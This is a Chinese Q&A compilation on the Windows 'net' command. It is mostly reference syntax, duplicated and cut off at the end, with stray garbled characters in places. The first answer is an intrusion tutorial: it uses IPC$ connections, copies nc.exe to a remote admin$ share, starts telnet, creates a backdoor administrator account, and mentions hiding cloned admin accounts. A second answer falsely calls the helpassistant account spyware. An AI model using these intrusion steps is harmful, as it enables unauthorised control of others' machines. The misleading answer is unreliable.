❶ 請教dos命令中的 net 詳細用法
net
這個命令是網路命令中最重要的一個,必須透徹掌握它的每一個子命令的用法,因為它的功能實在是太強大了,這簡直就是微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令,鍵入net/?回車如圖6。
在這里,我們重點掌握幾個入侵常用的子命令。
netview
使用此命令查看遠程主機的所以共享資源。命令格式為netview\\IP。如圖7。
netuse
把遠程主機的某個共享資源影射為本地盤符,圖形界面方便使用,呵呵。命令格式為netusex:\\IP\sharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7建立IPC$連接(netuse\\IP\IPC$"password"/user:"name"),如圖8。
建立了IPC$連接後,呵呵,就可以上傳文件了:nc.exe\\192.168.0.7\admin$,表示把本地目錄下的nc.exe傳到遠程主機,結合後面要介紹到的其他DOS命令就可以實現入侵了。
netstart
使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後,如果發現它的什麼服務沒有啟動,而你又想利用此服務怎麼辦?就使用這個命令來啟動吧。用法:netstartservername,如圖9,成功啟動了telnet服務。
netstop
入侵後發現遠程主機的某個服務礙手礙腳,怎麼辦?利用這個命令停掉就ok了,用法和netstart同。
netuser
查看和帳戶有關的情況,包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的,最重要的,它為我們克隆帳戶提供了前提。鍵入不帶參數的netuser,可以查看所有用戶,包括已經禁用的。下面分別講解。
1,netuserabcd1234/add,新建一個用戶名為abcd,密碼為1234的帳戶,默認為user組成員。
2,netuserabcd/del,將用戶名為abcd的用戶刪除。
3,netuserabcd/active:no,將用戶名為abcd的用戶禁用。
4,netuserabcd/active:yes,激活用戶名為abcd的用戶。
5,netuserabcd,查看用戶名為abcd的用戶的情況,如圖10。
netlocalgroup
查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的netlocalgroup即列出當前所有的用戶組。在入侵過程中,我們一般利用它來把某個帳戶提升為administrator組帳戶,這樣我們利用這個帳戶就可以控制整個遠程主機了。用法:/add,如圖11。
現在我們把剛才新建的用戶abcd加到administrator組里去了,這時候abcd用戶已經是超級管理員了,呵呵,你可以再使用netuserabcd來查看他的狀態,和圖10進行比較就可以看出來。但這樣太明顯了,網管一看用戶情況就能漏出破綻,所以這種方法只能對付菜鳥網管,但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員,這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。
nettime
這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面,那麼也許就用不到這個命令了。但簡單的入侵成功了,難道只是看看嗎?我們需要進一步滲透。這就連遠程主機當前的時間都需要知道,因為利用時間和其他手段(後面會講到)可以實現某個命令和程序的定時啟動,為我們進一步入侵打好基礎。用法:nettime\\IP。
❷ 我在命令行輸入net user後出現命令行運行完畢,但發生一個或多個錯誤。怎麼辦
這個問題我來回答,你的net user里只能有 administrator 和
guest
這兩個賬戶,也就是管理員賬戶和臨時賬戶其他的那個叫helpassistant的賬戶是遠程桌面協助賬戶,也就是你的同事或朋友在你的電腦里種下的影子賬戶,目的是遠程監視你的一舉一動,可以在你操作電腦的同時,對你進行實時的查看,他就和使用自己的電腦一樣的管理你的電腦,這招很陰險,竊取別人的隱私而不被發現,想辦法把他刪了,或者重新做系統,加設硬碟還原。關閉所有的本地文件共享和遠程登錄設置,關閉所有不必要的系統服務和埠,經常查看是否有可疑進程和系統內存的用量,總之沒有一個操作系統是無懈可擊的,說一整天也說不完,我們大家多多學習吧。
❸ windows net 命令的用法大全
許多 Windows NT 網路命令以 net 開始。這些 net 命令有一些公共屬性:
通過鍵入 net /? 可查閱所有可用的 net 命令。
通過鍵入 net help 命令可在命令行中獲得 net 命令的語法幫助。例如,要得到 net acco
unts 命令的幫助,請鍵入 net help accounts。
所有 net 命令接受選項 / yes 和 /no(可縮寫為 / y 和 /n )。/ y 對命令產生的任何交互提示自動回答「是」,/n 回答「否」。例如,net stop server 通常提示確認是否根據伺服器服務結束所有服務,net stop server /y 自動回答「是」並關閉伺服器服務。
Net Accounts
更新用戶帳號資料庫、更改密碼及所有帳號的登錄要求。必須要在更改帳號參數的計算機上運行網路登錄服務。
net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days |
unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
net accounts [/sync] [/domain]
參數
無
鍵入不帶參數的 net accounts,將顯示當前密碼設置、登錄時限及域信息。
/forcelogoff:{minutes | no}
設置當用戶帳號或有效登錄時間過期時,結束用戶和伺服器會話前的等待時間。no 選項禁止強行注銷。該參數的默認設置為 no。 指定 /forcelogoff:minutes 之後,Windows NT 在其強制用戶退出網路 minutes 分鍾之前,將給用戶發出警報。如果還有打開的文件,Windows NT 將警告用戶。如果 minutes 小於兩分鍾,Windows NT 警告用戶立即從網路注銷。
/minpwlen:length
設置用戶帳號密碼的最少字元數。允許范圍是 0-14,默認值為 6。
/maxpwage:{days | unlimited}
設置用戶帳號密碼有效的最大天數。unlimited 不設置最大天數。/maxpwage 選項的天數必須大於 /minpwage。允許范圍是 1-49,710 天 (unlimited)。默認值為 90 天。
/minpwage:days
設置用戶必須保持原密碼的最小天數。 0 值不設置最小時間。允許范圍是 0-49,710 天,默認值為 0 天。
/uniquepw:number
要求用戶更改密碼時,必須在經過 number 次後,才能重復使用與之相同的密碼。允許范圍是 0-8。默認值為 5。
/domain
在當前域的主域控制器上執行該操作。否則只在本地計算機執行操作。
該參數僅用於 Windows NT Server 域中的 Windows NT Workstation 計算機,Windows NT Server 計算機默認為在主域控制器執行操作。
/sync
當用於主域控制器時,該命令使域中所有備份域控制器同步;當用於備份域控制器時,該命令僅使該備份域控制器與主域控制器同步。該命令僅適用於 Windows NT Server 域成員的計算機。
Net Computer
從域資料庫中添加或刪除計算機。該命令僅在運行 Windows NT Server 的計算機上可用。
net computer \computername {/add | /del}
參數
\computername
指定要添加到域或從域中刪除的計算機。
/add
將指定計算機添加到域。
/del
將指定計算機從域中刪除。
Net Config
顯示當前運行的可配置服務,或顯示並更改某項服務的設置。
net config [service [options]]
參數
無
鍵入不帶參數的 net config 將顯示可配置服務的列表。
service
通過 net config 命令進行配置的服務(server 或 workstation)。
options
服務的特定選項。完整語法請參閱 net config server 或 net config workstation。
Net Config Server
運行服務時顯示或更改伺服器的服務設置。
net config server [/autodisconnect:time] [/srvcomment:"text "] [/hidden:{yes | n
o}]
參數
無
鍵入不帶參數的 net config server,將顯示伺服器服務的當前配置。
/autodisconnect:time
設置斷開前用戶會話閑置的最大時間值。可以指定 -1,表示永不斷開連接。允許范圍是 -1-65535 分鍾,默認值是 15 分鍾。
/srvcomment:"text "
為伺服器添加註釋,可以通過 net view 命令在屏幕上顯示所加註釋。注釋最多可達 48 個字元,文字要用引號引住。
/hidden:{yes | no}
指定伺服器的計算機名是否出現在伺服器列表中。請注意隱含某個伺服器並不改變該伺服器的許可權。默認為 no。
Net Config Workstation
服務運行時,顯示或更改工作站各項服務的設置。
net config workstation [/charcount:bytes] [/chartime:msec] [/charwait:sec]
參數
無
鍵入不帶參數的 net config workstation 將顯示本地計算機的當前配置。
/charcount:bytes
指定 Windows NT 在將數據發送到通訊設備之前收集的數據量。如果同時設置 /chartime:msec 參數,Windows NT 按首先滿足條件的選項運行。允許范圍是 0-65535 位元組,默認值是16 位元組。
/chartime:msec
指定 Windows NT 在將數據發送到通訊設備之前收集數據的時間。如果同時設置 /charcount:bytes 參數,Windows NT 按首先滿足條件的選項運行。允許范圍是 0-65535000 毫秒,默認值是 250 毫秒。
/charwait:sec
設置 Windows NT 等待通訊設備變為可用的時間。允許的范圍是 0-65535 秒,默認值是 3600 秒。
Net Continue
重新激活掛起的服務。
net continue service
參數
service
能夠繼續運行的服務,包括: file server for macintosh(該服務僅限於 Windows NT Server), ftp publishing service, lpdsvc, net logon, network dde,network dde dsdm,nt lm security support provider,remoteboot(該服務僅限於 Windows NT Server),remote access server, schele,server,simple tcp/ip services 及 workstation 。
Net File
顯示某伺服器上所有打開的共享文件名及鎖定文件數。該命令也可以關閉個別文件並取消文件鎖定。
net file [id [/close]]
參數
無
鍵入不帶參數的 net file 可獲得伺服器上打開文件的列表。
id
文件標識號。
/close
關閉打開的文件並釋放鎖定記錄。請從共享文件的伺服器中鍵入該命令。
Net Group
在 Windows NT Server 域中添加、顯示或更改全局組。該命令僅在 Windows NT Server 域中可用。
net group [groupname [/comment:"text "]] [/domain]
net group groupname {/add [/comment:"text "] | /delete} [/domain]
net group groupname username [ ...] {/add | /delete} [/domain]
參數
無
鍵入不帶參數的 net group 可以顯示伺服器名稱及伺服器的組名稱。
groupname
要添加、擴展或刪除的組。僅提供某個組名便可查看組中的用戶列表。
/comment:"text "
為新建組或現有組添加註釋。注釋最多可以是 48 個字元,並用引號將注釋文字引住。
/domain
在當前域的主域控制器中執行該操作,否則在本地計算機上執行操作。
該參數僅用於作為 Windows NT Server 域成員的 Windows NT Workstation 計算機。Windows NT Server 計算機默認為在主域控制器中操作。
username[ ...]
列表顯示要添加到組或從組中刪除的一個或多個用戶。使用空格分隔多個用戶名稱項。
/add
添加組或在組中添加用戶名。必須使用該命令為添加到組中的用戶建立帳號。
/delete
刪除組或從組中刪除用戶名。
Net Help
提供網路命令列表及幫助主題,或提供指定命令或主題的幫助。可用網路命令列於 N 下面的「命令參考」中「命令」窗口內。
net help [command]
net command {/help | /?}
參數
無
鍵入不帶參數的 net help 顯示能夠獲得幫助的命令列表和幫助主題。
command
需要其幫助的命令,不要將 net 作為 command 的一部分。
/help
提供顯示幫助文本方式選擇。
/?
顯示命令的正確語法。
Net Helpmsg
提供 Windows NT 錯誤信息的幫助。
net helpmsg message#
參數
message#
需要其幫助的 Windows NT 消息的四位代碼。
Net Localgroup
添加、顯示或更改本地組。
net localgroup [groupname [/comment:"text "]] [/domain]
net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
net localgroup groupname name [ ...] {/add | /delete} [/domain]
參數
無
鍵入不帶參數的 net localgroup 將顯示伺服器名稱和計算機的本地組名稱。
groupname
要添加、擴充或刪除的本地組名稱。只提供 groupname 即可查看用戶列表或本地組中的全局組。
/comment: "text "
為新建或現有組添加註釋。注釋文字的最大長度是 48 個字元,並用引號引住。
/domain
在當前域的主域控制器中執行操作,否則僅在本地計算機上執行操作。
該參數僅應用於 Windows NT Server 域中的 Windows NT Workstation 計算機。Windows NT Server 計算機默認為在主域控制器中操作。
name [ ...]
列出要添加到本地組或從本地組中刪除的一個或多個用戶名或組名,多個用戶名或組名之間以空格分隔。可以是本地用戶、其他域用戶或全局組,但不能是其他本地組。如果是其他域的用戶,要在用戶名前加域名(例如,SALESRALPHR)。
/add
將全局組名或用戶名添加到本地組中。在使用該命令將用戶或全局組添加到本地組之前,必
須為其建立帳號。
/delete
從本地組中刪除組名或用戶名。
Net Name
添加或刪除消息名(有時也稱別名),或顯示計算機接收消息的名稱列表。要使用 net name 命令,計算機中必須運行信使服務。
net name [name [/add | /delete]]
參數
無
鍵入不帶參數的 net name 將列出當前使用的名稱。
name
指定接收消息的名稱。名稱最多為 15 個字元。
/add
將名稱添加到計算機中。 /add 是可選項,鍵入 net name name 與鍵入 net name name /add 相同。
/delete
從計算機中刪除名稱。
Net Pause
暫停正在運行的服務。
net pause service
參數
service
指下列服務: file server for macintosh(僅限於 Windows NT Server)、ftp publishing service、lpdsvc、net logon、network dde、network dde dsdm、nt lm security support provider、remoteboot(僅限於 Windows NT Server)、remote access server、schele、server、simple tcp/ip services 或 workstation 。
Net Print
顯示或控制列印作業及列印隊列。
net print \computername sharename
net print [\computername ] job# [/hold | /release | /delete]
參數
computername
共享列印機隊列的計算機名。
sharename
列印隊列名稱。當包含 computername 與 sharename 時,使用反斜杠 () 將它們分開。
job#
在列印機隊列中分配給列印作業的標識號。有一個或多個列印機隊列的計算機為每個列印作業分配唯一標識號。如果某個作業號用於共享列印機隊列中,則不能指定給其他作業,也不能分配給其他列印機隊列中的作業。
/hold
使用 job# 時,在列印機隊列中使列印作業等待。列印作業停留在列印機隊列中,並且其他列印作業只能等到釋放該作業之後才能進入。
/release
釋放保留的列印作業。
/delete
從列印機隊列中刪除列印作業。
Net Send
向網路的其他用戶、計算機或通信名發送消息。要接收消息必須運行信使服務。
net send {name | * | /domain[:name] | /users} message
參數
name
要接收發送消息的用戶名、計算機名或通信名。如果計算機名包含空字元,則要將其用引號(" ") 引住。
*
將消息發送到組中所有名稱。
/domain[:name]
將消息發送到計算機域中的所有名稱。如果指定 name,則消息將發送到指定域或組中的所有名稱。
/users
將消息發送到與伺服器連接的所有用戶。
message
作為消息發送的文本。
Net Session
列出或斷開本地計算機和與之連接的客戶端的會話。
net session [\computername] [/delete]
參數
無
鍵入不帶參數的 net session 可以顯示所有與本地計算機的會話的信息。
\computername
標識要列出或斷開會話的計算機。
/delete
結束與 \computername 計算機會話並關閉本次會話期間計算機的所有打開文件。如果省略\computername 參數,將取消與本地計算機的所有會話。
Net Share
創建、刪除或顯示共享資源。
net share sharename
net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
net share sharename [/users:number | unlimited] [/remark:"text"]
net share {sharename | drive:path} /delete
參數
無
鍵入不帶參數的 net share 將顯示本地計算機上所有共享資源的信息。
sharename
是共享資源的網路名稱。鍵入帶 sharename 的 net share 命令,只顯示該共享信息。
drive:path
指定共享目錄的絕對路徑。
/users:number
設置可同時訪問共享資源的最大用戶數。
/unlimited
不限制同時訪問共享資源的用戶數。
/remark:"text "
添加關於資源的注釋,注釋文字用引號引住。
/delete
停止共享資源。
Net Start
啟動服務,或顯示已啟動服務的列表。如果服務名是兩個或兩個以上的詞,如 Net Logon 或Computer Browser,則必須用引號 (") 引住。.
net start [service]
參數
無
鍵入不帶參數的 net start 則顯示運行服務的列表。
service
包括下列服務: alerter、client service for netware、clipbook server、computer browser、dhcp client 、directory replicator 、eventlog 、ftp publishing service 、lpdsvc、messenger 、net logon 、network dde 、network dde dsdm 、network monitoring agent 、nt lm security support provider 、ole 、remote access connection manager 、remote access isnsap service 、remote access server 、remote procere call (rpc) locator 、remote procere call (rpc) service 、schele 、server 、simple tcp/ip services 、snmp、spooler 、tcp/ip netbios helper 、ups 及 workstation
。
下列服務僅在 Windows NT Server 下可用:file server for macintosh、gateway service for netware、microsoft dhcp server、print server for macintosh、remoteboot、windows internet name service 。
Net Statistics
顯示本地工作站或伺服器服務的統計記錄。
net statistics [workstation | server]
參數
無
鍵入不帶參數的 net statistics 將列出其統計信息可用的運行服務。
workstation
顯示本地工作站服務的統計信息。
server
顯示本地伺服器服務的統計信息。
Net Stop
停止 Windows NT 網路服務。
net stop service
參數
service
包括下列服務: alerter(警報)、client service for netware(Netware 客戶端服務)、clipbook server(剪貼簿伺服器)、computer browser(計算機瀏覽器)、directory replicator(目錄復制器)、ftp publishing service (ftp )(ftp 發行服務)、lpdsvc、messenger(信使)、net logon(網路登錄)、network dde(網路 dde)、network dde dsdm(網路 dde dsdm)、network monitor agent(網路監控代理)、nt lm security support provider(NT LM 安全性支持提供)、ole(對象鏈接與嵌入)、remote access connection manager(遠程訪問連接管理器)、remote access isnsap service(遠程訪問 isnsap 服務)、remote access server(遠程訪問伺服器)、remote procere call (rpc) locator(遠程過程調用定位器)、remote procere call (rpc) service(遠程過程調用服務)、schele(調度)、server(伺服器)、simple tcp/ip services(簡單 TCP/IP 服務)、snmp、spooler(後台列印程序)、tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)、ups 及 workstation(工作站)。
下列服務僅在 Windows NT Server 中可用: file server for macintosh、gateway service for netware、microsoft dhcp server、print server for macintosh、remoteboot、windows internet name service
使計算機的時鍾與另一台計算機或域的時間同步。不帶 /set 參數使用時,將顯示另一台計算機或域的時間。
net time [\computername | /domain[:name]] [/set]
參數
\computername
要檢查或同步的伺服器名。
/domain[:name]
指定要與其時間同步的域。
/set
使本計算機時鍾與指定計算機或域的時鍾同步。
Net Use
連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。該命令也控制永久網路連接。
net use [devicename | *] [\computernamesharename[volume]] [password | *]] [/user:[domainname]username] [[/delete] | [/persistent:{yes | no}]] net use devicename [/home[password | *]] [/delete:{yes | no}] net use [/persistent:{yes | no}]
參數
無
鍵入不帶參數的 net use 將列出網路連接。
devicename
指定要連接到的資源名稱或要斷開的設備名稱。有兩類設備名:磁碟驅動器(D: 到 Z:)和列印機(LPT1: 到 LPT3)。若鍵入星號而不是指定設備名將分配下一個可用設備名。
\computernamesharename
伺服器及共享資源的名稱。如果計算機名包含空白字元,要用引號 (" ") 將雙反斜線及計算機名引住。計算機名長度可以是 1-15 個字元。
volume
指定伺服器上的 NetWare 卷。要連接到 NetWare 伺服器,必須安裝並運行 NetWare 客戶機服務 (Windows NT Workstation) 或 NetWare 網關服務 (Windows NT Server)。
password
訪問共享資源的密碼。
*
提示鍵入密碼。在密碼提示行中鍵入密碼時,將不顯示該密碼。
/user
指定進行連接的另外一個用戶。
domainname
指定另一個域。例如 net use d: \servershare /user:adminmariel 連接用戶 mariel,如同從 admin 域連接一樣。如果省略域,將使用當前登錄域。
username
指定登錄的用戶名。
/home
將用戶連接到其宿主目錄。
/delete
取消指定網路連接。如果用戶以星號指定連接,則取消所有網路連接。
/persistent
控制永久網路連接的使用。默認為上次使用的設置。無設備的連接不是永久的。
yes
保存建立的所有連接,並在下次登錄時還原。
no
不保存建立的連接和繼發連接,並在下次登錄時還原現有連接。使用 /delete 開關項取消永久連接。
Net User
添加或更改用戶帳號或顯示用戶帳號信息。
net user [username [password | *] [options]] [/domain]
net user username {password | *} /add [options] [/domain]
net user username [/delete] [/domain]
參數
無
鍵入不帶參數的 net user 將查看計算機上的用戶帳號列表。
username
添加、刪除、更改或查看用戶帳號名。用戶帳號名最多可以有 20 個字元。
password
為用戶帳號分配或更改密碼。密碼必須滿足在 net accounts 命令 /minpwlen 選項中設置的最小參數。最多是 14 個字元。
*
提示輸入密碼。在密碼提示行中鍵入密碼時,將不顯示該密碼。
/domain
在計算機主域的主域控制器中執行操作。
該參數僅在 Windows NT Server 域成員的 Windows NT Workstation 計算機上可用。默認情況下,Windows NT Server 計算機在主域控制器中執行操作。
注意:在計算機主域的主域控制器發生該動作。它可能不是登錄域。
/add
將用戶帳號添加到用戶帳號資料庫。
/delete
從用戶帳號資料庫中刪除用戶帳號。
選項如下所示:
/active:{no | yes}
啟用或禁止用戶帳號。如果不激活用戶帳號,用戶就不能訪問計算機上的資源。默認值是 yes (激活)。
/comment:"text"
提供用戶帳號的注釋。該注釋最多可以有 48 個字元,文字用引號引住。
/countrycode:nnn
使用操作系統的國家代碼以便為用戶幫助和錯誤信息文件提供指定語言文件。0 值表示默認國家代碼。
/expires:{date | never}
如果設置 date,將導致用戶帳號過期,never 不對用戶帳號設置時間限制。過期日期根據 /countrycode 值可以是下列格式: mm/dd/yy、dd/mm/yy 或 mmm, dd, yy。注意帳號在指定日期開始時過期。月份可以是數字、全名或三個字母的簡拼。年可以是兩位或四位數,使用逗號或斜線(不要用空格) 區分日期的各部分。如果省略 yy ,則使用該日期下一次到來的年份(根據計算機的時鍾)。例如如果在 1994 年 1 月 10 日到 1995 年 1 月 8 日之間輸入下列日期項,那它們相同:jan,9 1/9/95
january,9,1995
1/9
/fullname:"name"
指定用戶全名而不是用戶名。用引號將名字引住。
/homedir:path
設置用戶宿主目錄的路徑。該路徑必須存在。
/homedirreq:{yes | no}
設置是否需要宿主目錄。
/passwordchg:{yes | no}
指定用戶是否能改變自己的密碼。默認值是 yes。
/passwordreq:{yes | no}
指定用戶帳號是否需要密碼,默認值是 yes。
/profilepath:[path]
設置用戶登錄配置文件的路徑。該路徑名指向注冊表配置文件。
/scriptpath:path
為用戶登錄腳本設置路徑。Path 不能是絕對路徑;
path 是相對於 %systemroot%SYSTEM32REPLIMPORTSCRIPTS 的相對路徑:。
/times:{times | all}
指定允許用戶使用計算機的時間。times 值表示為 day[-day][, day[-day]] , time[-time][, time[-time]], 增量限制為一小時。Days 可以是全名或簡寫(M、T、W、Th、F、Sa、Su)。Hours 可以是 12 小時制或 24 小時制。對於 12 小時值,使用 AM、PM 或 A.M、P.M。all 表示用戶總可以登錄。空值表示用戶永遠不能登錄。用逗號分隔日期和時間,分隔時間和日期的單位用分號(例如 M,4AM-5PM; T,1PM-3PM)。指定 /times 時不要使用空格。
/usercomment:"text "
讓管理員添加或更改帳號的「用戶注釋」。用引號引住文字。
/workstations:{computername[,...] | *}
列出最多八個用戶可以登錄到網路的工作站。用逗號分隔列表中的多個項。如果 /workstations 沒有列表,或如果列表是星號「*」,則用戶可以從任何一台計算機登錄。
Net View
顯示域列表、計算機列表或指定計算機的共享資源列表。
net view [\computername | /domain[:domainname]]
net view /network:nw [\computername]
參數
無
鍵入不帶參數的 net view 將顯示當前域的計算機列表。
\computername
指定要查看其共享資源的計算機。
/domain[:domainname]
指定要查看其可用計算機的域。如果省略 domainname ,則顯示網路的所有域。
/network:nw
顯示 NetWare 網路中所有可用的伺服器。如果指定計算機名,則顯示 NetWare 網路中該計算機的可用資源。也可以用此開關指定添加到系統中的其他網路。
❹ Win10系統進入命令行界面,輸入net是黃色字母
黃色沒問題。一樣用。
❺ net命令怎麼使用
NET命令有非常多,這兒有一些比較常用的,而且有解釋,(開始是NET命令的概宴世況和用途
後面是一些常用的命令):
(1)NET命令是一個命令行命令。
(2)管理網路環境、服務、用戶、登陸等本地信息
(3)WIN 98,WIN WORKSTATION和WIN NT都內置了NET命令。
(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。
(5)WORKSTATION和SERVER中的NET命令基本相同。
(6)獲得HELP
<1>在NT下可以用圖形的方式,開始-》幫助-》索引-》輸入NET
<2>在COMMAND下可以用字元方式,NET /?或NET或NET HELP得到一些方法 相應的方法的幫助NET
COMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另對於錯誤NET HELPMSG MESSAGE#是4位
數
(7)強制參數 所有net命令接受選項/yes和/no(可縮寫為/y和/n)。[簡單的說就是預先給系統的 提問
一個答案]
(8)有一些命令是馬上產生作用並永久保存的,使用的時候要慎重
(9)對於NET命令的功能都可以找到相應的圖形工具的解決方案
(10)命令晌鎮肢的組成 命令 參數 選項 │ 參數 選項 │ 參數 選項 │。。
瘰癧羅嗦說了一大堆,其實就是6和7有用,呵呵 另有兩件事:
(1)在NT的NET命令中有一些參數是只有在SERVER環境中才能使用的
(2)在WIN98的NET命令中有一些參數不能在DOS-WIN中使用,只能在DOS環境中使用
下面對NET命令的不同參數的基本用法做一些初步的介紹:
(1)NET VIEW
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式:net view [\\computername │ /domain[omainname]]
參數介紹:
<1>鍵入不帶參數的net view顯示當前域的計算機列表。
<2>\\computername 指定要查看其共享資源的計算機。
<3>/domain[omainname]指定要查看其可用計算機的域
簡單事例
<1>net view \\YFANG查看YFANG的共享資源列表。
<2>net view /domain:LOVE查看LOVE域中的機器列表。
(2)NET USER
作 用:添加或更改用戶帳號或顯示用戶帳號信息。該命令也可以寫為 net users。
命令格式:net user [username [password │ *] [options]] [/domain]
參數介紹:
<1>鍵入不帶參數的net user查看計算機上的用戶帳號列表。
<2>username添加、刪除、更改或查看用戶帳號名。
<3>password為用戶帳號分配或更改密碼。
<4>*提示輸入密碼。
<5>/domain在計算機主域的主域控制器中執行操作。
簡單事例:
<1>net user yfang查看用戶YFANG的信息
(3)NET USE
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。
命令格式:net use [devicename │ *] [\\computername\sharename[\volume]] [password │
*]] [/user:[domainname\]username] [[/delete] │ [/persistent:{yes │ no}]]
參數介紹:
鍵入不帶參數的net use列出網路連接。
devicename指定要連接到的資源名稱或要斷開的設備名稱。 \\computername\sharename伺服器及共
享資源的名稱。
password訪問共享資源的密碼。
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。
domainname指定另一個域。
username指定登錄的用戶名。
/home將用戶連接到其宿主目錄
/delete取消指定網路連接。
/persistent控制旅缺永久網路連接的使用。
簡單事例:
<1>net use e: \\YFANG\TEMP將\\YFANG\TEMP目錄建立為E盤
<2>net use e: \\YFANG\TEMP /delete斷開連接
(4)NET TIME
作 用:使計算機的時鍾與另一台計算機或域的時間同步。
命令格式:net time [\\computername │ /domain[:name]] [/set]
參數介紹:
<1>\\computername要檢查或同步的伺服器名。
<2>/domain[:name]指定要與其時間同步的域。
<3>/set使本計算機時鍾與指定計算機或域的時鍾同步。
下面的這4個參數是相關的,所以一起介紹
(5)Net Start
作 用:啟動服務,或顯示已啟動服務的列表。
命令格式:net start service
(6)Net Pause
作 用:暫停正在運行的服務。
命令格式:net pause service
(7)Net Continue
作 用:重新激活掛起的服務。
命令格式:net continue service
(8)NET STOP
作 用:停止 Windows NT 網路服務。
命令格式:net stop service
參數介紹:我們來看看這些服務都是什麼
<1>alerter(警報)
<2>client service for netware(Netware 客戶端服務)
<3>clipbook server(剪貼簿伺服器)
<4>computer browser(計算機瀏覽器)
<5>directory replicator(目錄復制器)
<6>ftp publishing service (ftp )(ftp 發行服務)
<7>lpdsvc
<8>net logon(網路登錄) <9>network dde網路 dde)
<10>network dde dsdm(網路 dde dsdm)
<11>network monitor agent(網路監控代理)
<12>nt lm security support provider(NT LM 安全性支持提供)
<13>ole(對象鏈接與嵌入)
<14>remote access connection manager(遠程訪問連接管理器)
<15>remote access isnsap service(遠程訪問 isnsap 服務)
<16>remote access server(遠程訪問伺服器)
<17>remote procere call (rpc) locator(遠程過程調用定位器)
<18>remote procere call (rpc) service(遠程過程調用服務)
<19>schele(調度)
<20>server(伺服器)
<21>simple tcp/ip services(簡單 TCP/IP 服務)
<22>snmp
<23>spooler(後台列印程序)
<24>tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)
<25>ups (26)workstation(工作站)
<27>messenger(信使)
<28>dhcp client
<29>eventlog 以下這些SERVICE只能在NT SERVER上使用
<< 1>> )file server for macintosh
<<2>>gateway service for netware
<<3>>microsoft dhcp server
<<4>>print server for macintosh
<<5>>remoteboot
<<6>>windows internet name service
(9)Net Statistics
作 用:顯示本地工作站或伺服器服務的統計記錄。
命令格式:net statistics [workstation │ server]
參數介紹:
<1>鍵入不帶參數的net statistics列出其統計信息可用的運行服務。 <2>workstation顯示本地工作
站服務的統計信息。
<3>server顯示本地伺服器服務的統計信息。
簡單事例:
<1>net statistics server │ more顯示伺服器服務的統計信息
❻ NET 命令有哪些都是干什麼用的
NET命令有非常多,這兒有一些比較常用的,而且有解釋,(開始是NET命令的概況和用途
後面是一些常用的命令):
(1)NET命令是一個命令行命令。
(2)管理網路環境、服務、用戶、登陸等本地信息
(3)WIN 98,WIN WORKSTATION和WIN NT都內置了NET命令。
(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。
(5)WORKSTATION和SERVER中的NET命令基本相同。
(6)獲得HELP
<1>在NT下可以用圖形的方式,開始-》幫助-》索引-》輸入NET
<2>在COMMAND下可以用字元方式,NET /?或NET或NET HELP得到一些方法 相應的方法的幫助NET
COMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另對於錯誤NET HELPMSG MESSAGE#是4位
數
(7)強制參數 所有net命令接受選項/yes和/no(可縮寫為/y和/n)。[簡單的說就是預先給系統的 提問
一個答案]
(8)有一些命令是馬上產生作用並永久保存的,使用的時候要慎重
(9)對於NET命令的功能都可以找到相應的圖形工具的解決方案
(10)命令的組成 命令 參數 選項 │ 參數 選項 │ 參數 選項 │。。
瘰癧羅嗦說了一大堆,其實就是6和7有用,呵呵 另有兩件事:
(1)在NT的NET命令中有一些參數是只有在SERVER環境中才能使用的
(2)在WIN98的NET命令中有一些參數不能在DOS-WIN中使用,只能在DOS環境中使用
下面對NET命令的不同參數的基本用法做一些初步的介紹:
(1)NET VIEW
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式:net view [\\computername │ /domain[omainname]]
參數介紹:
<1>鍵入不帶參數的net view顯示當前域的計算機列表。
<2>\\computername 指定要查看其共享資源的計算機。
<3>/domain[omainname]指定要查看其可用計算機的域
簡單事例
<1>net view \\YFANG查看YFANG的共享資源列表。
<2>net view /domain:LOVE查看LOVE域中的機器列表。
(2)NET USER
作 用:添加或更改用戶帳號或顯示用戶帳號信息。該命令也可以寫為 net users。
命令格式:net user [username [password │ *] [options]] [/domain]
參數介紹:
<1>鍵入不帶參數的net user查看計算機上的用戶帳號列表。
<2>username添加、刪除、更改或查看用戶帳號名。
<3>password為用戶帳號分配或更改密碼。
<4>*提示輸入密碼。
<5>/domain在計算機主域的主域控制器中執行操作。
簡單事例:
<1>net user yfang查看用戶YFANG的信息
(3)NET USE
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。
命令格式:net use [devicename │ *] [\\computername\sharename[\volume]] [password │
*]] [/user:[domainname\]username] [[/delete] │ [/persistent:{yes │ no}]]
參數介紹:
鍵入不帶參數的net use列出網路連接。
devicename指定要連接到的資源名稱或要斷開的設備名稱。 \\computername\sharename伺服器及共
享資源的名稱。
password訪問共享資源的密碼。
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。
domainname指定另一個域。
username指定登錄的用戶名。
/home將用戶連接到其宿主目錄
/delete取消指定網路連接。
/persistent控制永久網路連接的使用。
簡單事例:
<1>net use e: \\YFANG\TEMP將\\YFANG\TEMP目錄建立為E盤
<2>net use e: \\YFANG\TEMP /delete斷開連接
(4)NET TIME
作 用:使計算機的時鍾與另一台計算機或域的時間同步。
命令格式:net time [\\computername │ /domain[:name]] [/set]
參數介紹:
<1>\\computername要檢查或同步的伺服器名。
<2>/domain[:name]指定要與其時間同步的域。
